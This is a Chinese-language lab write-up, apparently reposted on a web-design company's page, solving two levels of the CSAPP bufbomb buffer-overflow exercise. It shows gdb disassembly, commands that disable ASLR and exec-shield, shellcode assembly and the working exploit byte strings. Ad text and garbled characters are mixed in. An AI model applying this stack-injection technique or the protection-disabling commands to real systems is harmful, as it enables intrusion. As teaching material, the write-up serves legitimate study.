Level 2: firecracker(30分)
專注于為中小企業(yè)提供成都網(wǎng)站制作��、做網(wǎng)站服務(wù),電腦端+手機(jī)端+微信端的三站合一,更高效的管理,為中小企業(yè)皮山免費(fèi)做網(wǎng)站提供優(yōu)質(zhì)的服務(wù)�����。我們立足成都���,凝聚了一批互聯(lián)網(wǎng)行業(yè)人才,有力地推動(dòng)了1000+企業(yè)的穩(wěn)健成長����,幫助中小企業(yè)通過網(wǎng)站建設(shè)實(shí)現(xiàn)規(guī)模擴(kuò)充和轉(zhuǎn)變。
bufbomb中存在一個(gè)bang函數(shù)��,
int global_value = 0;
void bang(int val)
{
if (global_value == cookie) {
printf("Bang!: You set global_value to 0x%x\n", global_value);
validate(2);
} else
printf("Misfire: global_value = 0x%x\n", global_value);
exit(0);
}與前面兩關(guān)類似�,要求調(diào)用getbuf后返回到bang,并設(shè)置全局變量global_value為自己的cookie.
從這一關(guān)開始��,需要在堆棧的buf中布置可執(zhí)行的shellcode����,經(jīng)過實(shí)驗(yàn)��,發(fā)現(xiàn)自己機(jī)器中Ubuntu 12.04.5的堆棧區(qū)不可執(zhí)行(May sombody tell me?)���,由于沒有找到關(guān)閉的方法��,在虛擬機(jī)中安裝Fedora 7�,按如下方式關(guān)閉堆棧不可執(zhí)行和隨機(jī)化����,繼續(xù)進(jìn)行實(shí)驗(yàn)�����。
sysctl –w kernel.randomize_va_space=0
sysctl –w kernel.exec-shield=0
在gdb中反匯編bang�����,獲得存儲(chǔ)全局變量global_value的地址為0x804aa60���,bang函數(shù)的入口地址為0x804898c
[root@localhost buflab]# gdb -q ./bufbomb
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) disass bang
Dump of assembler code for function bang:
0x0804898c : mov 0x804aa60,%eax ;將global_value賦給%eax
0x08048991 : push %ebp
0x08048992 : mov %esp,%ebp
0x08048994 : sub $0x8,%esp
0x08048997 : cmp 0x804aa50,%eax ; 比較cookie與global_value
0x0804899d : jne 0x80489c0
0x0804899f : add $0xfffffff8,%esp
0x080489a2 : push %eax
0x080489a3 : push $0x80493e0
0x080489a8 : call 0x8048748
0x080489ad : add $0xfffffff4,%esp
0x080489b0 : push $0x2
0x080489b2 : call 0x8048c30
0x080489b7 : add $0x20,%esp
0x080489ba : jmp 0x80489d1
0x080489bc : lea 0x0(%esi),%esi
0x080489c0 : add $0xfffffff8,%esp
0x080489c3 : push %eax
0x080489c4 : push $0x8049405
0x080489c9 : call 0x8048748
0x080489ce : add $0x10,%esp
0x080489d1 : add $0xfffffff4,%esp
接下來�����,需要在buf中布置設(shè)置全局變量和跳轉(zhuǎn)到bang中的shellcode��,并將ret設(shè)置成buf
在調(diào)試中獲得buf
(gdb) disass getbuf
Dump of assembler code for function getbuf:
0x08048a44 : push %ebp
0x08048a45 : mov %esp,%ebp
0x08048a47 : sub $0x18,%esp
0x08048a4a : add $0xfffffff4,%esp
0x08048a4d : lea 0xfffffff4(%ebp),%eax �;buf=%ebp-12
0x08048a50 : push %eax
0x08048a51 : call 0x8048b50
0x08048a56 : mov $0x1,%eax
0x08048a5b : mov %ebp,%esp
0x08048a5d : pop %ebp
0x08048a5e : ret
End of assembler dump.
在地址0x08048a50處設(shè)置斷點(diǎn)并運(yùn)行,得知buf為0xbfffb0bc
(gdb) b *0x8048a50
Breakpoint 1 at 0x8048a50
(gdb) run -t heen
Starting program: /root/Desktop/buflab/bufbomb -t heen
Team: heen
Cookie: 0x5573b7cf
(gdb) p $ebp+0xfffffff4
$2 = (void *) 0xbfffb0bc
接下來編寫shellcode���,
[root@localhost buflab]# cat exploit3_shellcode.s
pushl $0x804898c ;bang入口地址
movl $0x5573b7cf, %eax
movl %eax, 0x804aa60 ��;設(shè)置cookie
ret
[root@localhost buflab]# gcc -c exploit3_shellcode.s
[root@localhost buflab]# objdump -d exploit3_shellcode.o
exploit3_shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <.text>:
0: 68 8c 89 04 08 push $0x804898c
5: b8 cf b7 73 55 mov $0x5573b7cf,%eax
a: a3 60 aa 04 08 mov %eax,0x804aa60
f: c3 ret
最終獲得shellcode的16進(jìn)制機(jī)器碼����,為16字節(jié),剛好夠用����。于是exploit string為shellcode加上buf
[root@localhost buflab]# cat exploit3.txt
68 8c 89 04 08 b8 cf b7 73 55 a3 60 aa 04 08 c3 bc b0 ff bf
[root@localhost buflab]# cat exploit3.txt|./sendstring|./bufbomb -t heen
Team: heen
Cookie: 0x5573b7cf
Type string:Bang!: You set global_value to 0x5573b7cf
NICE JOB!
Level 3: Dynamite (40分)
這一關(guān)要求getbuf返回到test當(dāng)中,但是不能破壞為test函數(shù)維護(hù)的堆棧狀態(tài)(test函數(shù)加了堆棧狀態(tài)檢測)���,同時(shí)加test函數(shù)中的調(diào)用getbuf后的返回值為自己的cookie�。test函數(shù)如下����,
void test()
{
int val;
volatile int local = 0xdeadbeef;
val = getbuf();
/* Check for corrupted stack */
if (local != 0xdeadbeef) {
printf("Sabotaged!: the stack has been corrupted\n");
}
else if (val == cookie) {
printf("Boom!: getbuf returned 0x%x\n", val);
validate(3);
}
else {
printf("Dud: getbuf returned 0x%x\n", val);
}
}這要求我們的shellcode不能破壞getbuf調(diào)用函數(shù)test的堆棧狀態(tài),既需要返回到test中�����,也需要恢復(fù)SFP即test的?��;稥BP,而恢復(fù)?��;酚袃煞N方法:一是在shellcode中設(shè)置���,二是在exploit string中的合適位置填入SFP����,這里我們選擇了第二種方法�����。
反匯編test函數(shù)��,獲得getbuf調(diào)用的正常返回地址�����。
(gdb) disass test
Dump of assembler code for function test:
0x080489dc : push %ebp
0x080489dd : mov %esp,%ebp
0x080489df : sub $0x18,%esp
0x080489e2 : movl $0xdeadbeef,0xfffffffc(%ebp)
0x080489e9 : call 0x8048a44
0x080489ee : mov %eax,%edx ���;0x080489ee為getbuf返回地址
0x080489f0 : mov 0xfffffffc(%ebp),%eax
0x080489f3 : cmp $0xdeadbeef,%eax
0x080489f8 : je 0x8048a10
0x080489fa : add $0xfffffff4,%esp
0x080489fd : push $0x8049440
0x08048a02 : call 0x8048748
0x08048a07 : jmp 0x8048a40
0x08048a09 : lea 0x0(%esi),%esi
0x08048a10 : cmp 0x804aa50,%edx
0x08048a16 : jne 0x8048a32
0x08048a18 : add $0xfffffff8,%esp
0x08048a1b : push %edx
0x08048a1c : push $0x804946a
0x08048a21 : call 0x8048748
0x08048a26 : add $0xfffffff4,%esp
0x08048a29 : push $0x3
---Type to continue, or q to quit---
在0x80489df中下斷點(diǎn)�,獲得其?���;返闹禐?xbfffb0e8
(gdb) b *0x80489df
Breakpoint 2 at 0x80489df
(gdb) run -t heen
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/buflab/bufbomb -t heen
Team: heen
Cookie: 0x5573b7cf
Breakpoint 2, 0x080489df in test ()
(gdb) p $ebp
$3 = (void *) 0xbfffb0e8
編寫shellcode,獲得其16進(jìn)制的機(jī)器碼
[root@localhost buflab]# cat exploit4_shellcode.s
movl $0x5573b7cf, %eax
push $0x80489ee
ret
[root@localhost buflab]# gcc -c exploit4_shellcode.s
[root@localhost buflab]# objdump -d exploit4_shellcode.o
exploit4_shellcode.o: file format elf32-i386
Disassembly of section .text:
00000000 <.text>:
0: b8 cf b7 73 55 mov $0x5573b7cf,%eax �����;設(shè)置getbuf返回值為cookie
5: 68 ee 89 04 08 push $0x80489ee ;將getbuf返回地址壓棧
a: c3 ret
綜合前面的信息,得到exploit string, 其中字節(jié)ff可為任意字節(jié)(除了回車符0a和空字符00)
[root@localhost buflab]# cat exploit4.txt
b8 cf b7 73 55 68 ee 89 04 08 c3 ff e8 b0 ff bf bc b0 ff bf
[root@localhost buflab]# cat exploit4.txt|./sendstring|./bufbomb -t heen
Team: heen
Cookie: 0x5573b7cf
Type string:Boom!: getbuf returned 0x5573b7cf
NICE JOB!
當(dāng)前名稱:CSAPP緩沖區(qū)溢出實(shí)驗(yàn)記錄(二)
路徑分享:
http://weahome.cn/article/pchhhe.html
重慶分公司
重慶分公司
